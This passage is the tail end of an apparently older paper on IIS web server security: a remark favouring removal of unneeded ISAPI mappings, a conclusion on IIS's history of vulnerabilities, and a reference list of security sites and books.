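Filtering by extension is only a stopgap for an ISAPI mapping that should not exist in the first place: the paper's advice to remove the mapping outright (or, on Windows Server 2003, never enable it) is the durable fix, and the length limits catch the class of oversized-field probes that the .printer and WebDAV flaws relied on.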
denial-of-service vulnerabilities we have omitted from our discussion.
Conclusion
One of the most common ports-of-entry for an attacker is the HTTP server provided by Internet Information Services (IIS). These services have a long history of vulnerabilities, both within the server and in the core extensions that are installed by default. While most of the plug-in extensions execute under the restricted Internet user guest accounts, the core server process executes as a highly privileged system user. The common availability of this service combined with the variety of default exposures it contains has helped IIS earn an unenviable reputation for security [5].
The information presented here is really just the tip of the iceberg for web hacking. We have concentrated on IIS and its default extensions, but there is a whole world of different vulnerabilities present in the puzzle.
References
[1] http://www.atstake.com/research/tools/network_utilities/
[2] http://packetstormsecurity.
[3] http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp
[4] http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
[5] http://www.securiteam.com
[6] http://www.securiteam.com/exploits/archive
[7] McClure S., Scambray J. and Kurtz G. (1999), Hacking Exposed: Network Security Secrets and Solutions, Osborne/McGraw-Hill, pp. 45–47.
[8] Michael O’Dea (2003), HackNotes Windows Security Portable Reference, McGraw-Hill/Osborne, pp. 124–126.
[9] Mike Shema (2003), HackNotes Web Security Portable Reference, McGraw-Hill/Osborne, p. 96.
[10] Mike Shema and Bradley C. Johnson (2004), Anti-Hacker Tool Kit, McGraw-Hill/Osborne, p. 23.